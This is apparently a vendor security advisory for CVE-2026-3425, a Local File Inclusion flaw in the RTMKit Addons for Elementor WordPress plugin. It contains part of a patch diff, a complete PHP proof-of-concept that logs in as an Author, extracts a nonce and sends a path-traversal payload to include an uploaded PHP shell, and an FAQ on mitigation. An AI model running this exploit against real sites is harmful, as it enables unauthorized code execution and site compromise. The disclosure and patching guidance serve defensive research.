                                 <svg width="30" height="30" viewBox="0 0 24 29" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
                                     <path d="M3.49698 9.00236L4.78398 19.9374H19.227L20.513 9.00236L16.503 11.6754L12.005 5.37836L7.50698 11.6754L3.49698 9.00236ZM2.80598 6.13736L7.00498 8.93736L11.191 3.07636C11.2835 2.94673 11.4056 2.84107 11.5472 2.76816C11.6888 2.69526 11.8457 2.65723 12.005 2.65723C12.1642 2.65723 12.3212 2.69526 12.4628 2.76816C12.6044 2.84107 12.7265 2.94673 12.819 3.07636L17.005 8.93636L21.205 6.13736C21.3639 6.03169 21.5497 5.97368 21.7404 5.97019C21.9312 5.96669 22.119 6.01785 22.2817 6.11762C22.4443 6.2174 22.575 6.36163 22.6584 6.53328C22.7417 6.70493 22.7742 6.89684 22.752 7.08636L21.11 21.0534C21.0816 21.2968 20.9647 21.5213 20.7817 21.6843C20.5986 21.8472 20.3621 21.9373 20.117 21.9374H3.89398C3.6489 21.9373 3.41236 21.8472 3.22931 21.6843C3.04625 21.5213 2.92941 21.2968 2.90098 21.0534L1.25798 7.08736C1.2354 6.89761 1.26767 6.70536 1.35095 6.53337C1.43424 6.36138 1.56506 6.21686 1.72792 6.11691C1.89079 6.01696 2.07889 5.96576 2.26995 5.96939C2.461 5.97301 2.64702 6.0313 2.80598 6.13736ZM12.006 15.9374C11.7433 15.9374 11.4833 15.8858 11.2406 15.7853C10.9979 15.6849 10.7774 15.5376 10.5916 15.3519C10.4059 15.1663 10.2585 14.9458 10.1579 14.7032C10.0573 14.4606 10.0055 14.2005 10.0055 13.9379C10.0054 13.6752 10.0571 13.4151 10.1575 13.1725C10.258 12.9298 10.4052 12.7093 10.5909 12.5235C10.7766 12.3377 10.997 12.1904 11.2397 12.0898C11.4823 11.9892 11.7423 11.9374 12.005 11.9374C12.5354 11.9374 13.0441 12.1481 13.4192 12.5231C13.7943 12.8982 14.005 13.4069 14.005 13.9374C14.005 14.4678 13.7943 14.9765 13.4192 15.3516C13.0441 15.7266 12.5364 15.9374 12.006 15.9374Z" fill="#121416"></path>
                                 </svg>
@@ -249,7 +248,7 @@
                 </div>
             </div>
         </div>
-        <?php foreach ($datas['data_template'] as $data) :
+        <?php foreach ($datas['data_template'] as $data) :
             $manifest = json_decode(file_get_contents($rtmTemplateDir . '/' . $data['hash_id'] . '/manifest.json'));
             $imgurl = $rtmTemplateUrl . '/' . $data['hash_id'] . '/' . $manifest->templates[0]->screenshot;
         ?>
--- a/rometheme-for-elementor/views/modules.php
+++ b/rometheme-for-elementor/views/modules.php
@@ -91,7 +91,7 @@
                 <div id="<?php echo esc_attr($c) ?>" class="card rounded-4  flex-column gap-3">
                     <div class="pb-4 pt-1 border-bottom d-flex align-items-center gap-3">
                         <i class="fa-solid fa-circle" style="font-size: 10px;"></i>
-                        <h4 class="m-0"><?php echo esc_html(ucwords($c)) ?></h4>
+                        <h4 class="m-0"><?php echo esc_html(ucwords($c == 'themebuilder' ? 'Theme Builder' : $c)) ?></h4>
                     </div>
                     <div class="row row-cols-3 g-3">
                         <?php
--- a/rometheme-for-elementor/views/setup-wizard.php
+++ b/rometheme-for-elementor/views/setup-wizard.php
@@ -407,7 +407,7 @@

                     <div class="footer">
                         <button id="next-button" class="btn btn-link" data-next="4">Back</button>
-                        <button id="next-button" class="btn btn-gradient-accent" data-next="6">Next</button>
+                        <button id="next-button" class="btn btn-gradient-accent" data-next="6">Skip</button>
                     </div>
                 </div>
             </div>
--- a/rometheme-for-elementor/views/sidebar.php
+++ b/rometheme-for-elementor/views/sidebar.php
@@ -26,6 +26,8 @@
 </svg>
 '
 ];
+
+$isProActive = RTMKitCorePlugin::instance()->pro_is_active();
 ?>


@@ -40,32 +42,34 @@
         <div class="menus gap-3">
             <?php foreach ($menus as $section => $items): ?>
                 <div class="menu-section">
-
-                        <button class="btn btn-transparent menu-dropdown" type="button" data-bs-toggle="collapse" data-bs-target="#<?php echo esc_attr($section) ?>" aria-expanded="<?php echo ($section == 'get_started') ? esc_attr("true") : esc_attr("false") ?>" aria-controls="<?php echo esc_attr($section) ?>">
-                            <h3 class="menu-section-title m-0"><?php echo $icons[$section] ?><?php echo esc_html(ucfirst(str_replace('_', ' ', $section))); ?></h3>
-                        </button>
-                        <div class="collapse <?php echo ($section == 'get_started') ? esc_attr("show") : "" ?>" id="<?php echo esc_attr($section) ?>">
-                            <ul class="menu-list">
-                                <?php foreach ($items as $key => $item): ?>
-                                    <li class="menu-item">
-                                        <a target="<?php echo esc_attr($item['target']) ?>" href="<?php echo (isset($item['target'])) ? esc_url($item['menu_slug']) : esc_url('admin.php?page=' . $item['menu_slug']); ?>" class="menu-link <?php echo $path === str_replace('_', '-', $key) ? 'current' : ''; ?>">
-                                            <?php echo esc_html($item['title']); ?>
-                                        </a>
-                                    </li>
-                                <?php endforeach; ?>
-                            </ul>
-                        </div>
-
+
+                    <button class="btn btn-transparent menu-dropdown" type="button" data-bs-toggle="collapse" data-bs-target="#<?php echo esc_attr($section) ?>" aria-expanded="<?php echo ($section == 'get_started') ? esc_attr("true") : esc_attr("false") ?>" aria-controls="<?php echo esc_attr($section) ?>">
+                        <h3 class="menu-section-title m-0"><?php echo $icons[$section] ?><?php echo esc_html(ucfirst(str_replace('_', ' ', $section))); ?></h3>
+                    </button>
+                    <div class="collapse <?php echo ($section == 'get_started') ? esc_attr("show") : "" ?>" id="<?php echo esc_attr($section) ?>">
+                        <ul class="menu-list">
+                            <?php foreach ($items as $key => $item): ?>
+                                <li class="menu-item">
+                                    <a target="<?php echo esc_attr($item['target']) ?>" href="<?php echo (isset($item['target'])) ? esc_url($item['menu_slug']) : esc_url('admin.php?page=' . $item['menu_slug']); ?>" class="menu-link <?php echo $path === str_replace('_', '-', $key) ? 'current' : ''; ?>">
+                                        <?php echo esc_html($item['title']); ?>
+                                    </a>
+                                </li>
+                            <?php endforeach; ?>
+                        </ul>
+                    </div>
+
                 </div>
             <?php endforeach; ?>
         </div>
     </div>
     <div class="sidebar-footer">
-        <a href="https://rometheme.net/plugins/rtmkit/pricing/" target="_blank" class="btn btn-accent">
-            <svg width="30" height="30" viewBox="0 0 24 29" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
-                <path d="M3.49698 9.00236L4.78398 19.9374H19.227L20.513 9.00236L16.503 11.6754L12.005 5.37836L7.50698 11.6754L3.49698 9.00236ZM2.80598 6.13736L7.00498 8.93736L11.191 3.07636C11.2835 2.94673 11.4056 2.84107 11.5472 2.76816C11.6888 2.69526 11.8457 2.65723 12.005 2.65723C12.1642 2.65723 12.3212 2.69526 12.4628 2.76816C12.6044 2.84107 12.7265 2.94673 12.819 3.07636L17.005 8.93636L21.205 6.13736C21.3639 6.03169 21.5497 5.97368 21.7404 5.97019C21.9312 5.96669 22.119 6.01785 22.2817 6.11762C22.4443 6.2174 22.575 6.36163 22.6584 6.53328C22.7417 6.70493 22.7742 6.89684 22.752 7.08636L21.11 21.0534C21.0816 21.2968 20.9647 21.5213 20.7817 21.6843C20.5986 21.8472 20.3621 21.9373 20.117 21.9374H3.89398C3.6489 21.9373 3.41236 21.8472 3.22931 21.6843C3.04625 21.5213 2.92941 21.2968 2.90098 21.0534L1.25798 7.08736C1.2354 6.89761 1.26767 6.70536 1.35095 6.53337C1.43424 6.36138 1.56506 6.21686 1.72792 6.11691C1.89079 6.01696 2.07889 5.96576 2.26995 5.96939C2.461 5.97301 2.64702 6.0313 2.80598 6.13736ZM12.006 15.9374C11.7433 15.9374 11.4833 15.8858 11.2406 15.7853C10.9979 15.6849 10.7774 15.5376 10.5916 15.3519C10.4059 15.1663 10.2585 14.9458 10.1579 14.7032C10.0573 14.4606 10.0055 14.2005 10.0055 13.9379C10.0054 13.6752 10.0571 13.4151 10.1575 13.1725C10.258 12.9298 10.4052 12.7093 10.5909 12.5235C10.7766 12.3377 10.997 12.1904 11.2397 12.0898C11.4823 11.9892 11.7423 11.9374 12.005 11.9374C12.5354 11.9374 13.0441 12.1481 13.4192 12.5231C13.7943 12.8982 14.005 13.4069 14.005 13.9374C14.005 14.4678 13.7943 14.9765 13.4192 15.3516C13.0441 15.7266 12.5364 15.9374 12.006 15.9374Z" fill="#121416"></path>
-            </svg>
-            Go to Pro
-        </a>
+        <?php if (! $isProActive) : ?>
+            <a href="https://rometheme.net/plugins/rtmkit/pricing/" target="_blank" class="btn btn-accent">
+                <svg width="30" height="30" viewBox="0 0 24 29" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
+                    <path d="M3.49698 9.00236L4.78398 19.9374H19.227L20.513 9.00236L16.503 11.6754L12.005 5.37836L7.50698 11.6754L3.49698 9.00236ZM2.80598 6.13736L7.00498 8.93736L11.191 3.07636C11.2835 2.94673 11.4056 2.84107 11.5472 2.76816C11.6888 2.69526 11.8457 2.65723 12.005 2.65723C12.1642 2.65723 12.3212 2.69526 12.4628 2.76816C12.6044 2.84107 12.7265 2.94673 12.819 3.07636L17.005 8.93636L21.205 6.13736C21.3639 6.03169 21.5497 5.97368 21.7404 5.97019C21.9312 5.96669 22.119 6.01785 22.2817 6.11762C22.4443 6.2174 22.575 6.36163 22.6584 6.53328C22.7417 6.70493 22.7742 6.89684 22.752 7.08636L21.11 21.0534C21.0816 21.2968 20.9647 21.5213 20.7817 21.6843C20.5986 21.8472 20.3621 21.9373 20.117 21.9374H3.89398C3.6489 21.9373 3.41236 21.8472 3.22931 21.6843C3.04625 21.5213 2.92941 21.2968 2.90098 21.0534L1.25798 7.08736C1.2354 6.89761 1.26767 6.70536 1.35095 6.53337C1.43424 6.36138 1.56506 6.21686 1.72792 6.11691C1.89079 6.01696 2.07889 5.96576 2.26995 5.96939C2.461 5.97301 2.64702 6.0313 2.80598 6.13736ZM12.006 15.9374C11.7433 15.9374 11.4833 15.8858 11.2406 15.7853C10.9979 15.6849 10.7774 15.5376 10.5916 15.3519C10.4059 15.1663 10.2585 14.9458 10.1579 14.7032C10.0573 14.4606 10.0055 14.2005 10.0055 13.9379C10.0054 13.6752 10.0571 13.4151 10.1575 13.1725C10.258 12.9298 10.4052 12.7093 10.5909 12.5235C10.7766 12.3377 10.997 12.1904 11.2397 12.0898C11.4823 11.9892 11.7423 11.9374 12.005 11.9374C12.5354 11.9374 13.0441 12.1481 13.4192 12.5231C13.7943 12.8982 14.005 13.4069 14.005 13.9374C14.005 14.4678 13.7943 14.9765 13.4192 15.3516C13.0441 15.7266 12.5364 15.9374 12.006 15.9374Z" fill="#121416"></path>
+                </svg>
+                Go to Pro
+            </a>
+        <?php endif; ?>
     </div>
 </div>
 No newline at end of file

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3425 - RTMKit Addons for Elementor <= 2.0.2 - Authenticated (Author+) Local File Inclusion via 'path'

$target_url = 'http://example.com'; // Change to target WordPress site
$username = 'author'; // WordPress username with Author role
$password = 'password'; // WordPress password

// Step 1: Login and get cookies/nonce
$login_url = $target_url . '/wp-login.php';
$login_data = [
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Extract nonce from admin page
$admin_url = $target_url . '/wp-admin/admin.php?page=rtmkit';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$admin_page = curl_exec($ch);
curl_close($ch);

// Extract nonce from HTML
preg_match('/"rtmkit_nonce":"([a-f0-9]+)"/', $admin_page, $matches);
if (!isset($matches[1])) {
    // Try to find nonce in a script variable
    preg_match('/nonces*=s*"([a-f0-9]+)"/', $admin_page, $matches);
    if (!isset($matches[1])) {
        die("Failed to extract nonce. Check target and credentials.n");
    }
}
$nonce = $matches[1];
echo "[+] Extracted nonce: $noncen";

// Step 3: Exploit LFI via path traversal
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$payload = '../../../../wp-content/uploads/2026/03/evil'; // Path to uploaded PHP shell (without .php)
$post_data = [
    'action' => 'get_content',
    'nonce' => $nonce,
    'path' => $payload
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_HEADER, false);
$result = curl_exec($ch);
curl_close($ch);

echo "[+] Response:n$resultn";
echo "[+] Exploit completed. If the file exists and contains PHP code, it was executed.n";
?>

Frequently Asked Questions

What is CVE-2026-3425?
Overview of the vulnerability
CVE-2026-3425 is a high-severity vulnerability in the RTMKit Addons for Elementor plugin for WordPress. It allows authenticated users with Author-level access to exploit a Local File Inclusion (LFI) flaw via the ‘path’ parameter in the ‘get_content’ AJAX action, potentially leading to remote code execution.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the lack of proper validation and authorization checks in the ‘get_content’ method. An attacker can manipulate the ‘path’ parameter to include arbitrary PHP files on the server, allowing the execution of malicious code.
Who is affected by this vulnerability?
Identifying vulnerable users
All users of the RTMKit Addons for Elementor plugin version 2.0.2 and below are affected. Specifically, authenticated users with Author-level permissions or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the RTMKit Addons for Elementor plugin you are using. If it is version 2.0.2 or earlier, your site is at risk. Additionally, review your site’s logs for any unauthorized access attempts.
How can I fix CVE-2026-3425?
Mitigation steps
To fix CVE-2026-3425, update the RTMKit Addons for Elementor plugin to version 2.0.3 or later, where the vulnerability has been patched. Ensure that you regularly update all plugins to maintain security.
What does the CVSS score of 8.8 indicate?
Understanding severity levels
The CVSS score of 8.8 indicates a high severity level, meaning that exploitation could lead to significant impact, such as unauthorized access to sensitive data or remote code execution. Administrators should prioritize addressing this vulnerability.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
If exploited, this vulnerability can allow attackers to execute arbitrary PHP code, bypass access controls, and access sensitive data. This could lead to full compromise of the affected WordPress site.
What is a proof of concept in this context?
Demonstration of the vulnerability
The proof of concept provided illustrates how an attacker can exploit the vulnerability by logging in as an Author-level user and sending a crafted request to include a malicious PHP file. This demonstrates the ease of exploitation and the potential impact.
What should I do if I cannot update the plugin immediately?
Temporary mitigation measures
If immediate updating is not possible, consider restricting access to the affected AJAX action or disabling the plugin until a patch can be applied. Additionally, monitor your site for any suspicious activity.
How can I secure my WordPress site against similar vulnerabilities?
Best practices for WordPress security
To enhance security, regularly update all plugins and themes, use strong user roles and permissions, and implement security plugins that can help detect and prevent unauthorized access. Regular security audits are also recommended.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-3425 can be found on the official CVE database, security advisories from WordPress, and security blogs that cover vulnerabilities in WordPress plugins.
What is Local File Inclusion (LFI)?
Definition and implications
Local File Inclusion (LFI) is a type of vulnerability that allows an attacker to include files on a server through the web browser. This can lead to unauthorized access of sensitive files and execution of malicious scripts.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations